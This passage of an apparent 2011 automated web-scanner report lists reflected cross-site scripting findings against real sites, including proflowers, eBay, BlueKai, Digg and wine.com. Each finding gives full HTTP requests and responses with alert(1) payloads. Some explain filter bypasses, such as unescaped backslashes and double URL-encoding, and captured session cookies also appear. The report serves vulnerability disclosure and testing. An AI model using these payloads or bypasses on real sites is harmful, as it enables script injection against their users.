Path:   /flowers/20-Sweetheart-Tulips-30007357

Issue detail

The value of the trackingpgroup request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 43ef8\"%3balert(1)//47481d06965 was submitted in the trackingpgroup parameter. This input was echoed as 43ef8\\";alert(1)//47481d06965 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Request

GET /flowers/20-Sweetheart-Tulips-30007357?viewpos=1&trackingpgroup=HPM43ef8\"%3balert(1)//47481d06965&tile=hmpg_podB&Ref=HomeNoRef&PageSplit= HTTP/1.1
Host: products.proflowers.com
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PRVD=SiteSplitID=72; s_vi=[CS]v1|26AAC068051481C2-6000018C8039CEE6[CE]; MAX_PFC=ContentTrackingViews=ntraccountmanagementbanner1-NFX; ProductDetail_RecentlyViewed_PFC=30050119&2/11/2011 10:33:34 AM; mr_referredVisitor=0; RES_TRACKINGID=354557859711349; BrowsingStore=zgmozekoxgz51n2gdyx3kw0z; THIRTEENMONTHS_PFC=TestAssignmentValues=xpa-1,pfb-3,phl-2,pjt-4,pju-4,pbp-3,pjv-5,psb-4,pvo-1,pmt-2,xpb-1,pvm-1,poe-3,zzc-2,pjs-4,pcu-1,pfl-3,prf-3,pec-1,mpsmediapersonalitysplit-2,ntd-1,pbo-2,nte-2,ntc-2,ppv-2,pfp-3,phr-1,zza-1,psv-4,nta-2,pbl-1,ntb-2,pmo-1,ppr-2,prl-4,xpc-1,psr-2,pbr-3,pcy-7,zzb-1,gfr-1,apg-1,ppe-1,pcb-1; ENDOFDAY_PFC=TestAssignmentValues=; CURRENTSESSION_PFC=TestConfigDateTimeUpdated=2/11/2011 10:49:21 AM; CURRENTSESSION_=IPAddress=173.193.214.243; PFC_BrowserId=41f9dda9-9db3-4eb3-80d0-0479607be84f; PFC_PersInfo=; s_cc=true; RES_SESSIONID=687108066631481; ResonanceSegment=1; s_sq=proflodevelopment%3D%2526pid%253Dpfc%25253ALanding%25253AHome%2526pidt%253D1%2526oid%253Dhttp%25253A//products.proflowers.com/flowers/20-Sweetheart-Tulips-30007357%25253Fviewpos%25253D1%252526trackingpgroup%25253DHPM%252526ti%2526ot%253DA

Response

HTTP/1.1 200 OK
Cache-Control: private,no-cache, no-store
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
Set-Cookie: ASP.NET_SessionId=zgmozekoxgz51n2gdyx3kw0z; path=/; HttpOnly
X-AspNet-Version: 4.0.30319
Set-Cookie: ASP.NET_SessionId=zgmozekoxgz51n2gdyx3kw0z; path=/; HttpOnly
Set-Cookie: ProductDetail_RecentlyViewed_PFC=30050119&2/11/2011 10:33:34 AM?30007357&2/11/2011 10:55:01 AM; domain=.proflowers.com; expires=Thu, 12-May-2011 17:55:01 GMT; path=/
X-Powered-By: ASP.NET
Date: Fri, 11 Feb 2011 18:55:01 GMT
Content-Length: 155943


<noscript>
<div class="splashBox">
   <p>We...re Sorry - </p>
   <p style="border-bottom: 1px solid #fff786;"><b>Your browser does not have Javascript enabled</b>. Our site requires javascript to bro
...[SNIP]...
resx.itemid = "30007357";
resx.qty="1";
resx.price="29.98";
resx.total="";
resx.customerid="41f9dda9-9db3-4eb3-80d0-0479607be84f";
resx.transactionid = "";


resx.cv2 = "pfc";
resx.cv3 = "HPM43ef8\\";alert(1)//47481d06965";
resx.cv4 = "72";
resx.cv5="";
resx.cv6="";
resx.cv7 ="";
resx.cv8 ="";
resx.cv9 ="";
resx.cv10 ="";
resx.cv11 = "";
resx.cv12 ="";
resx.cv13 ="";
resx.cv14 = "homenoref";
resx.cv15 = "";
...[SNIP]...

2.62. http://products.proflowers.com/flowers/20-Sweetheart-Tulips-30007357 [viewpos parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://products.proflowers.com
Path:   /flowers/20-Sweetheart-Tulips-30007357

Issue detail

The value of the viewpos request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 63910\"%3balert(1)//baa6ca69c91 was submitted in the viewpos parameter. This input was echoed as 63910\\";alert(1)//baa6ca69c91 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Request

GET /flowers/20-Sweetheart-Tulips-30007357?viewpos=163910\"%3balert(1)//baa6ca69c91&trackingpgroup=HPM&tile=hmpg_podB&Ref=HomeNoRef&PageSplit= HTTP/1.1
Host: products.proflowers.com
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PRVD=SiteSplitID=72; s_vi=[CS]v1|26AAC068051481C2-6000018C8039CEE6[CE]; MAX_PFC=ContentTrackingViews=ntraccountmanagementbanner1-NFX; ProductDetail_RecentlyViewed_PFC=30050119&2/11/2011 10:33:34 AM; mr_referredVisitor=0; RES_TRACKINGID=354557859711349; BrowsingStore=zgmozekoxgz51n2gdyx3kw0z; THIRTEENMONTHS_PFC=TestAssignmentValues=xpa-1,pfb-3,phl-2,pjt-4,pju-4,pbp-3,pjv-5,psb-4,pvo-1,pmt-2,xpb-1,pvm-1,poe-3,zzc-2,pjs-4,pcu-1,pfl-3,prf-3,pec-1,mpsmediapersonalitysplit-2,ntd-1,pbo-2,nte-2,ntc-2,ppv-2,pfp-3,phr-1,zza-1,psv-4,nta-2,pbl-1,ntb-2,pmo-1,ppr-2,prl-4,xpc-1,psr-2,pbr-3,pcy-7,zzb-1,gfr-1,apg-1,ppe-1,pcb-1; ENDOFDAY_PFC=TestAssignmentValues=; CURRENTSESSION_PFC=TestConfigDateTimeUpdated=2/11/2011 10:49:21 AM; CURRENTSESSION_=IPAddress=173.193.214.243; PFC_BrowserId=41f9dda9-9db3-4eb3-80d0-0479607be84f; PFC_PersInfo=; s_cc=true; RES_SESSIONID=687108066631481; ResonanceSegment=1; s_sq=proflodevelopment%3D%2526pid%253Dpfc%25253ALanding%25253AHome%2526pidt%253D1%2526oid%253Dhttp%25253A//products.proflowers.com/flowers/20-Sweetheart-Tulips-30007357%25253Fviewpos%25253D1%252526trackingpgroup%25253DHPM%252526ti%2526ot%253DA

Response

HTTP/1.1 200 OK
Cache-Control: private,no-cache, no-store
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
Set-Cookie: ASP.NET_SessionId=zgmozekoxgz51n2gdyx3kw0z; path=/; HttpOnly
X-AspNet-Version: 4.0.30319
Set-Cookie: ASP.NET_SessionId=zgmozekoxgz51n2gdyx3kw0z; path=/; HttpOnly
Set-Cookie: ProductDetail_RecentlyViewed_PFC=30050119&2/11/2011 10:33:34 AM?30007357&2/11/2011 10:53:57 AM; domain=.proflowers.com; expires=Thu, 12-May-2011 17:53:57 GMT; path=/
X-Powered-By: ASP.NET
Date: Fri, 11 Feb 2011 18:53:58 GMT
Content-Length: 157371


<noscript>
<div class="splashBox">
   <p>We...re Sorry - </p>
   <p style="border-bottom: 1px solid #fff786;"><b>Your browser does not have Javascript enabled</b>. Our site requires javascript to bro
...[SNIP]...
.cv15 = "";
resx.cv16 ="true";

resx.cv17 ="";
resx.cv18 ="";

resx.cv19 = ""; /* revenue only pass in evar38 */
resx.cv20 = ""; /* event 10 includes c&h */
/* resx.cv21 = "" */
resx.cv22 ="163910\\";alert(1)//baa6ca69c91";
resx.cv23 = "";


resx.cv25 = "";
resx.cv26 = "";
resx.cv27= "";
resx.cv28 = "";/* check if it should be discount*/
resx.cv29 = "49.98";
resx.cv30 ="";
resx.cv31="";
resx.cv32="";
resx.c
...[SNIP]...

2.63. http://rover.ebay.com/idmap/0 [footer&cb parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://rover.ebay.com
Path:   /idmap/0

Issue detail

The value of the footer&cb request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload d0c65%3balert(1)//3c480ac7649 was submitted in the footer&cb parameter. This input was echoed as d0c65;alert(1)//3c480ac7649 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /idmap/0?footer&cb=vjo.dsf.assembly.VjClientAssembler._callback0d0c65%3balert(1)//3c480ac7649&_vrdm=1297449096889 HTTP/1.1
Host: rover.ebay.com
Proxy-Connection: keep-alive
Referer: http://www.ebay.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cssg=15fccc2d12e0a02652943d14ffeea689; s=CgAD4ACBNVtG0MTVmY2NjMmQxMmUwYTAyNjUyOTQzZDE0ZmZlZWE2ODmOKdKX; nonsession=CgADKACBWu4G0MTVmY2NjMmQxMmUwYTAyNjUyOTQzZDE0ZmZlZWE2OGEAywABTVWHPDEf/9BP; dp1=bu1p/QEBfX0BAX19AQA**4f36b3b4^tzo/1685117e787^; lucky9=5245946; npii=btrm/svid%3D991010211714f36b3c3^tguid/15fccc2d12e0a02652943d14ffeea68a4f36b3c3^cguid/f65c9e8712d0a0aa12e4b294ff6547f14f36b3c3^; ebay=%5Ecv%3D15555%5Esbf%3D%23100000%5Ejs%3D1%5Ecos%3D53%5E

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
RlogId: p4n%60rujfudlwc%3D9vt*ts67.1%3F17613-12e15fe4b6c
Cache-Control: private, no-cache
Pragma: no-cache
Content-Type: text/json
Date: Fri, 11 Feb 2011 18:31:50 GMT
Content-Length: 103

try{vjo.dsf.assembly.VjClientAssembler._callback0d0c65;alert(1)//3c480ac7649(["","",86400]);}catch(e){}

2.64. http://tags.bluekai.com/site/50 [phint parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://tags.bluekai.com
Path:   /site/50

Issue detail

The value of the phint request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 353f6%2527%253balert%25281%2529%252f%252fc16c49bef95 was submitted in the phint parameter. This input was echoed as 353f6';alert(1)//c16c49bef95 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Request

GET /site/50?ret=html&limit=4&btp=1&phint=kw%3D&phint=eid%3D283&phint=a%3D-1&phint=g%3D0&uhint=zip%3D0&phint=tcat%3D152869&phint=kh%3DDBDCB53F2576976D806D6498794024FC353f6%2527%253balert%25281%2529%252f%252fc16c49bef95&phint=bread%3D[Jewelry%20&%20Watches,%20Engagement%20&%20Wedding,%20Engagement%20Rings,%20Diamond,%20Diamond%20Solitaire%20with%20Accents]&phint=bin%3D1499.99&phint=asp%3DMain%20Stone%20Shape,Heart,Main%20Stone%20Treatment,Not%20Enhanced,Carat%20Total%20Weight,0.90%20-%201.39,Exact%20Carat%20Total%20Weight,.90,Main%20Stone%20Certification/Grading,EGL%20USA,Metal,14k%20White%20Gold,Metal%20Purity,14k,Ring%20Size,6,Main%20Stone,Diamond,Style,Engagement,Jewelry%20Type,Ring,Size,6,Gender,Women's HTTP/1.1
Host: tags.bluekai.com
Proxy-Connection: keep-alive
Referer: http://cgi.ebay.com/ws/eBayISAPI.dll?ViewItem&item=200565765597&_trksid=%20p2041474.m622&_trkparms=clkid%3D7016594469467627520
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bku=yQG99YBZ/AlFQiDm; bko=KJpE8VaQtwGt6JKHRxRlMYUehXOxymGwj1kYVzy1cny1eOvulA9hDSeRPV+7/WLPvwqdoutxBRZBQKWJA1UsT16n1RVJxRTw/Lq/z9zrJQADu2UU9GGO9BVGsj1=; bkw4=KJpfoXU9y1M90zU9LsXb9T1wLfZFggw1b65ZDFRyIQQM9y1f9f1C9XmeKTPo2fuHNK2Zy3bKkVWmDctEkRFSakNiNn1hUeBiRBMXGAMpaac3tH7I9+V4YpCxhSbwgwfJuNrLbgAjcW6RsvELmqEpyKodzE/yKnx01sh2sIMfjIUcuf8JY4RytoXJocT5DctrzWZ/C0sbK2ePQXh7RgC+0L9x8KcakQaVeNEm/1Q9142UU5SKALAj2M9Ss/O92Xrq1EOyj+fAFsK1ga8Y6+FlbIlgMzPrn4RysZQTD/VxOxBe+jJgTxoEjwDQdf3okMnBTLit+ffFlpL2gXQIevpK0ovOTKYwx18+oieUQ40fB/AOEO+Px+yP5K10UfNFZltN0eglCNPEGwgLQwoY7sRf7WSh8pdxc7Hd89wP1pBy95DFZKI5GtAOLQzDEGTBes9bojZOTErVXBGaNk53pzYyTrRbnkzn2wC9+yKA7GmCsvCKu0JDqg/kLgrrVMFedxXhFX9Ii9cAAg292ERp5HHUtSvcafg8Y8C9bodR1EeWdmq1+qRc3V4CjVYx71w/D1e3fXr9O3EOTxxYJH4t0pZuGJb8qurnsNQ296i2micNHGa1z5L5xvTeZEdJOsJwbAoYI3uXKM69XKMhg9==; bklc=4d55308f; bk=yQSpJZmZF9ysHNJo; bkc=KJh5NP+/asWD9m9pK2w55z7yxq5kYXJqAZD3VakKDFOuZ67KWSNyaTBWnSiAF/u/kWoCxQd5/R1/BJ9GLGH1GG59Y/EYY//GCRo/0FOOmt5tdoA8dXwmXrtz1dd+pakda/eco6YG+MvQ9/94fjjzqyw59hS9wj69SNVs1Nv8vNlzkYIziJXzpaX0rzgaUuZjXGDc/XnKZZTT+TWfEfvd6lOUJ/92VRaBJd1e5iiL/e23OKRh0EuKXWBUtJ4EyLXMjd5hE6yRc7/9MBECdCDKekQ6clHp3drgKzDJT1n24d0MU167aIwppubx7BfOwU31rbvOm24nfRFkd+qBwHfAoFAv+IeatGmdJKpcIz4T0cH4KOG2FQsQflhry9jFe8ecJamXXWRwxWtY9AIfXlYdqxUAfNQWjkmXXOSLp6rBYkCV0+E8AJ+2lYcJkYXziKF8CwF8L2gyC5wzwj/oU2isXyA2DveBqMQGrDZ02yql0IFzy87zcIv8X0XY1XNcKOFVlpbXcp/8UfJSq8GcLHSU/CuR4HlxdPL0hxLlR8WroQezwZPTxEnaY8dxpFKZ8i5tQvkS4WdmkVO2U/AZ6d+QBLDnlX42ELnlBlbCamFebuO4fK9KkAp8yAKNXPK4oVs2EnSEqy6R7LETsz0wXNv2mGeXuMnkYX2Mw8C+Ol9rkbgg/q2o8SjTTHazZ0BuQzyaybAfQJ7iCSKNXp7pl7YmZp+3tgYEpgKcrbZUKI3STK5GsIqw70lHlqIjZXRUo7pbfGXgDClW0ICbl1mi9+llJamIXOeVjp7Vz0ntp0i/PHNvTvjTTPazbtfzgfUaFVGIKS5A242W16TwV+a4EeTrrPT0Ek5lYm++gCgQlz55rr1XlJxFf1cILH3+yWhlkr8kOp4aYN5QwSu6RJdL1oyLZKva3fE8kZ7rNLjFLhorkw0Fh7Y+BHydSzAvV1sir+4w4uKeIbfArAHa20I+cM8qyLX7clJpVd2yetndWab775KX0SDjladdzL5QFhRsgEbYtNB6DpXpKyffG2AFWgZ2u5pjK5paAFNcewXchwiH2x==; bkst=KJhkAnNv96WDCxzBYYqOyk/DYyLnPIq7p+0jxixZSXyZi6Q6DjrxpHoJk/6sTb3BMSt5gteoWtQkwGYkRsV77VIQLNLJlrg07U18C8LCE8wWpF+ahzIxjfLFWv8NV0+xMQAj5ue9y9kWtcUY+QRCOOgEh4MBLd8Ub8XQGIQGsLHHqHy+IgjGZQ9aTWoEek/pQ6oydEsV0awjBYl5dK04bXzDl4hc5hqBWfX6G1KBJ7MPA323y6S840qweb35653sWAapYpbEwF4Vm6mvOq4rrANdXXugRgZNcD4fkXmTTQpgXwmNRZl8UBGHaxUeMEszYD6jYFa07uEmogJCkWFvrWODisi6W5t2cuFw8x7JAzBN+IB57HqfrN8diu4XNFJaWF4YkLwLApuP/WDnxZe/mE4/QpRLtf2v3RNK4RQndi28rkgN; bkdc=res

Response

HTTP/1.0 200 OK
Date: Fri, 11 Feb 2011 18:33:06 GMT
P3P: CP="NOI DSP COR CUR ADMo DEVo PSAo PSDo OUR SAMo BUS UNI NAV", policyref="http://tags.bluekai.com/w3c/p3p.xml"
Pragma: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-Control: max-age=0, no-cache, no-store
Set-Cookie: bk=4ReD5tQsbDzsHNJo; expires=Wed, 10-Aug-2011 18:33:06 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkc=KJh5NV+/aaWD9m9prIFbVYUeuA6LYa2Jk3kQj4k/0D5+JFks+W/UODD+3vEDeHWokzvW4Fxsaunxxvn/WMvJ4QHY/OPsDWxoPWHuCMI6ztq7foNp4XpL4MF7lcFZpoZfuxeyBAVepITuoTq4AdY/MKeKGBMSY1yjT5hebfAcN7swOc/lvefQT18HUsUMeQar3XZHmcRxNrI3AcRGoFsWK069K2LOPArkAhmTuyvTvPXTOG26paX6rEu9r6xh8xFlIU3XnDAbG8GfDlaArluccTOw79SqEtR84uY7Zw0QsjCca5BXyFzewnbzbOZw7BqBwETrlVXcsvpW2zL8bgxRwrpQN+4UXn/dx9YrdX14HUGImxdcBp+qzP/q2d9JfrJ3qrocL0BYrq2NzGdPzPm2yANTLggh+IieVc2/OJZrY6IChpRY5JdwzBgQ2uc03svva2TDOa9KgzcMpAhzqNLtIELtQ5ADnfyPIdBuMxSV8Dv2c7J2On5n1KDnIIc241ENdaAZ4KW6+NLh8xFqLOfUwxNS4vEgaBz3egdOd4yb269v2dLGf30nyWpNYsdcd+rwNN6Zj07VIXNycdqiG3Xs10I5UF2VEwcY25iAYdW9+62Jp0rZKmasTd7KBwp/OtY09+IEzd7RcNKY04xIZWlhyimTlgcTdAqBatOdIBFJP2rTOhHEFFOhRdbPJT7Rnhm+8ar26C1RwTl8RKcDglRQFNO1IzJprOd1+9nTnhUG26BINzhBXzveKs2twyNu83DE5Q/phx+wszd7peFo595lTJu6wpN4Bl5+ad4ABKZ7SOFZp8lB2fo7Yp4Bn6p82BAEk3rfeAdeSlWBzfm2ckJ1Izn2tJ2at1XhrcXsx3CrPpxlhxLwTflry4PSU5i788Blv5qdEyhMK5Y1dZJ0QI/3hPirN0fL+2A0Qez457L5aLHBIzJOrcILOsLylj732jv5ZIvaifW4To+y7I0xMkB1XzvkHgtaCMrBIPrL6MVvd8PnPNQ2XHmVPvzPnn3f/g7FJcw4PPyjGl720IicEhqwImxMeZfgcITIleIWNhMwSXfAQZErglI8xlYdaQSMwIothc+BI87jLfQdZF6LCMLXkML+Ap+wzKxhb4XIxnqq; expires=Wed, 10-Aug-2011 18:33:06 GMT; path=/; domain=.bluekai.com
Set-Cookie: bko=KJpf01F9XvQCNJKHyRWJhonMCfcDGqJ1enGXe9hqlyRYhVjyyNMKDakZCMrXWeWZOCAIOGRYP7IQgY0Dhzp99juPAwxsiGAYhS8SmyBj37YEJfWh1eh8SKFnhiecOhmEOnJu2qV9bQYS/iJw; expires=Wed, 10-Aug-2011 18:33:06 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkou=KJhMRsOQRsn/pgOCuWkvuDT0BDTp1MDlLpxlufWy1WLh1fs61nz61E90uDLtOL3j3PL783xVkVQRSrggJhrSJj+RJ3VZVjGISQMNOHgWy1Sxka6zEylE9aj8va9=; expires=Wed, 10-Aug-2011 18:33:06 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkp1=KJhMRZOQ19niHytCFGy199y79MG=; expires=Wed, 10-Aug-2011 18:33:06 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkw4=KJ0P6NN/DtWROdedp+H+jk7BYpdYuLox12WttNprlEJ+SV1r7/aWkJYG854Xra9GWfDgn2J90GaYOH3hynE9hefG/GyiMexHP+AYxfgG/ignb7lwb5QXnkyceQIell7twXdp7Cxk/W1S9eV2j8L5PAir1eeH3Qvtfn3odo7/43kYQqarTJOXMpD8S2wXqcG6WKLMsSY9wOPTTbAoXuE8Igrz4hX1adD+s4FMC8/eXusRoJaFpEAEhQw0Yihud0pd431ih55fwtEb2V+QNQeHHJkDh4LaIFSVBZeTG2lbRIeECnUTmOsgMVwKEUtar3f9AigB/dVLwTzjnPOA0x6o8Elkt9YCdXvjX+sbgk/iPMo9Z72pm393ZNj85FFb0vQXbIKj3UmNmSNWgnx8aH+NxaBz5LtAH+hFVjiyUtZKvrgeDDS2tVcq5AWgwxIY005ijPTBndDEwEasN8nFMwilMX962RVMzKc2V+dXqwT8tIr80XoEhweSN+a5buua4wT1w4eQ3N6NrYJwurDPtViyATyzemmupM4ywQCZb++S8LoFSXP2UuLV8k76bLVbL2jt6CECwFYtXKv4dAq3YdqNZJTL0dmn8ocm7IVU/8Eb3fN8ohB6T7fBpz9UwdL5TUt29Ki45G5ZbbE7H234KuP33DI151Htb9nfcQKBynr7TfRrFVdIkTSLoUAvKSgJRqep+AMffft6zIFNEm7XoU7bmmS2+wdHfb3vC6Rhp8Hs+ZpII3cceVm2M4yX8HQiQmFs+h1sy7pxVievJDBNLsNadCCIdr03KlTFNFy4U+TIcJEeKpYdRpV4jrKmlEsh+tc2mpUYd8yzVmt8bBymiX4AdpFTrtztodDTRQS14uVbKH1AIhnwwlB9wcVv2dn1ltfgUDQ=; expires=Wed, 10-Aug-2011 18:33:06 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkdc=res; expires=Sat, 12-Feb-2011 18:33:06 GMT; path=/; domain=.bluekai.com
BK-Server: 7b05
Content-Length: 803
Content-Type: text/html
Connection: keep-alive

<html>
<head>
</head>
<body>
<div id="bk_exchange">
<img src="http://leadback.advertising.com/adcedge/lb?site=695501&srvc=1&betr=ebayus_cs=1&betq=7847=399109" width=1 height=1 border=0 alt="">
<img sr
...[SNIP]...
<script>var referrer='http://cgi.ebay.com/ws/eBayISAPI.dll?ViewItem&item=200565765597&_trksid=%20p2041474.m622&_trkparms=clkid%3D7016594469467627520'; var hashID='dbdcb53f2576976d806d6498794024fc353f6';alert(1)//c16c49bef95'; var taxonomyJSON=[[27651,5540,5266,3177,19,3],[79063,6463]];</script>
...[SNIP]...

2.65. http://widgets.digg.com/buttons/count [url parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://widgets.digg.com
Path:   /buttons/count

Issue detail

The value of the url request parameter is copied into the HTML document as plain text between tags. The payload c78a6<script>alert(1)</script>c0a5c709b0 was submitted in the url parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /buttons/count?url=http%3A//www.pcworld.com/article/219333/online_dating_for_nerds_looking_for_love_in_all_the_wrong_postings.html%3Ftk%3Dhp_fvc78a6<script>alert(1)</script>c0a5c709b0 HTTP/1.1
Host: widgets.digg.com
Proxy-Connection: keep-alive
Referer: http://www.pcworld.com/article/219333/online_dating_for_nerds_looking_for_love_in_all_the_wrong_postings.html?tk=hp_fv
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Age: 0
Date: Fri, 11 Feb 2011 19:29:38 GMT
Via: NS-CACHE: 100
Etag: "6907248ba8c229d7c8a253fd71e5626f06790e77"
Content-Length: 202
Server: TornadoServer/0.1
Content-Type: application/json
Accept-Ranges: bytes
Cache-Control: private, max-age=599
Expires: Fri, 11 Feb 2011 19:39:37 GMT
X-CDN: Cotendo
Connection: Keep-Alive

__DBW.collectDiggs({"url": "http://www.pcworld.com/article/219333/online_dating_for_nerds_looking_for_love_in_all_the_wrong_postings.html?tk=hp_fvc78a6<script>alert(1)</script>c0a5c709b0", "diggs": 0});

2.66. http://wine.com/ScriptResource.axd [Lo0P parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://wine.com
Path:   /ScriptResource.axd

Issue detail

The value of the Lo0P request parameter is copied into the HTML document as plain text between tags. The payload a836c<script>alert(1)</script>d5c85703c59 was submitted in the Lo0P parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ScriptResource.axd?d=PgH5St8dPYp-M6V0e1Sv4J62EmWHLuUQLyMUU497oGCvM7n-loDrr_U_qOqjXBQILQ8VIK6G_D8TDkker9cfHYQVHHYRULH-xJWPNgQAM3c1&t=16ab2387&Lo0P=a836c<script>alert(1)</script>d5c85703c59 HTTP/1.1
Host: wine.com
Proxy-Connection: keep-alive
Referer: http://www.wine.com/?s=error_404
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; __utma=32446520.451721562.1297605361.1297605361.1297605361.1; __utmb=32446520; __utmc=32446520; __utmz=32446520.1297605361.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/31|utmcmd=referral; SL_Audience=484|Accelerated|343|1|0; SL_NV1=1|1

Response

HTTP/1.1 404 Not Found
Server: SLRS
Date: Sun, 13 Feb 2011 13:56:49 GMT
Content-Type: text/html
Content-Length: 376

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD><BODY><H1>Not Found</H1>The requested URL /ScriptResource.axd?d=PgH5St8dPYp-M6V0e1Sv4J62EmWHLuUQLyMUU497oGCvM7n-loDrr_U_qOqjXBQILQ8VIK6G_D8TDkker9cfHYQVHHYRULH-xJWPNgQAM3c1&t=16ab2387&Lo0P=a836c<script>alert(1)</script>d5c85703c59 was not found on this server.<P>
...[SNIP]...

2.67. http://wine.com/i-js.js [Lo0P parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://wine.com
Path:   /i-js.js

Issue detail

The value of the Lo0P request parameter is copied into the HTML document as plain text between tags. The payload bb1ee<script>alert(1)</script>f06a7ee3dc9 was submitted in the Lo0P parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /i-js.js?Lo0P=bb1ee<script>alert(1)</script>f06a7ee3dc9 HTTP/1.1
Host: wine.com
Proxy-Connection: keep-alive
Referer: http://www.wine.com/?s=error_404
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=32446520.1297605361.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/31|utmcmd=referral; SL_Audience=484|Accelerated|343|1|0; SL_NV1=1|1; __utma=32446520.451721562.1297605361.1297605361.1297605361.1; __utmc=32446520; __utmb=32446520.1.10.1297605361; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 404 Not Found
Server: SLRS
Date: Sun, 13 Feb 2011 13:57:09 GMT
Content-Type: text/html
Content-Length: 243

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD><BODY><H1>Not Found</H1>The requested URL /i-js.js?Lo0P=bb1ee<script>alert(1)</script>f06a7ee3dc9 was not found on this server.<P>
...[SNIP]...

2.68. http://wine.com/includes/analytics/s_remote_code.js [Lo0P parameter]  previous  next

Summary

Severity:   High
